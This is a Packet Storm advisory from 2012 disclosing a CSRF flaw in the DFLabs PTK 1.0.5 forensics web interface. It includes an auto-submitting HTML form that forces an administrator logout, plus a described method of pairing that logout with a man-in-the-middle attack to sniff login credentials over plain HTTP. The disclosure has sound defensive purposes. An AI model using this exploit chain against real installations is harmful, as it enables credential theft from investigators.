exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

DFLabs PTK 1.0.5 Cross Site Request Forgery

DFLabs PTK 1.0.5 Cross Site Request Forgery
Posted Feb 23, 2012
Authored by Ivano Binetti

DFLabs PTK versions 1.0.5 and below suffer from a cross site request forgery vulnerability.

tags | exploit, csrf
SHA-256 | d0dd0d5291656beb902ee24cbf78e1bb2167be976fb908dc3778acf0386749d2

DFLabs PTK 1.0.5 Cross Site Request Forgery

Change Mirror Download
+---------------------------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : DFLabs PTK <= 1.0.5 Multiple Vulnerabilities (Steal Authentication Credentials)
# Date : 22-02-2012
# Author : Ivano Binetti (http://ivanobinetti.com)
# Software link : http://sourceforge.net/projects/ptk-forensics/files/latest/download
# Vendor site : http://www.dflabs.com
# Version : 1.0.5 (and lower)
# Tested on : Ubuntu 10.04
+---------------------------------------------------------------------------------------------------------------------------------------------------+
+-------------------------[Steal Authentication Credentials by Ivano Binetti]-----------------------------------------------------------------------+
Summary

1)Introduction
2)Vulnerability Description
3)Exploit

+---------------------------------------------------------------------------------------------------------------------------------------------------+

1)Introduction
DFLabs PTK is "an alternative advanced interface for the suite TSK (The Sleuth Kit)".

2)Vulnerability Description
PTK 1.0.5 (and lower) suffer from a CSRF vulnerability which allows an attacker to force administrator/investigator logout at web management
interface. Furthermore PTK's default installation (following the procedure indicated into PTK's "INSTALL" file) doesn't perform "http to https"
redirection in order to secure http connection by transport layer encryption. To default there isn't https redirection in the authentication
phase as well as there isn't https redirection during other PTK's activities. If an internal attacker (the nature of this tool makes difficult
that PTK may have public ip address) makes an Man in the Middle attack (I successfully made it using Dsniff and Ettercap) the CSRF vulnerability
found, forcing the administrator/investigator to logout, will aid the attacker to sniff authentication credentials. This condition can occur when
PTK is used in production environment and the investigator is conducting an analysis about internal people. Of course this logic can be extended
to any person which has access to internal LAN as an attacker which with a client-based exploit can control a internal client which can reach
PTK's server.

This vulnerability is correlated to poor session check into /<ptk_main_directory>/lib/logout.php script. In fact, differently from other php
script, where there is the php code like the following to session's check:

if (!isset($_SESSION['case_token']) or strcmp($_SESSION['user'],"admin")!=0 or strcmp($_SESSION['case_token'],$_GET['tk'])!=0 or $token_age > 300){
new AuditLog('Unauthorized access to delete_case '.sanitize(RemoveXSS($_GET['id']),PARANOID));
header("location: goto_home.php");

into /<ptk_main_directory>/lib/logout.php there isn't tha above check. This security flaw allows an attacker to force administrator/investigator
logout using a CSRF vulnerability.
When an administrator/investigator browses a web pages which contains the following html/javascript code he is forced to logout at the PTK web
management interface.

3)Exploit
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to force ADMIN/INVESTIGATOR logout</H2>
<form method="GET" name="form0" action="http://<ptk_ip_address>:80/lib/logout.php">
</form>
</body>
</html>

+--------------------------------------------------------------------------------------------------------------------------------------------------+
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    0 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close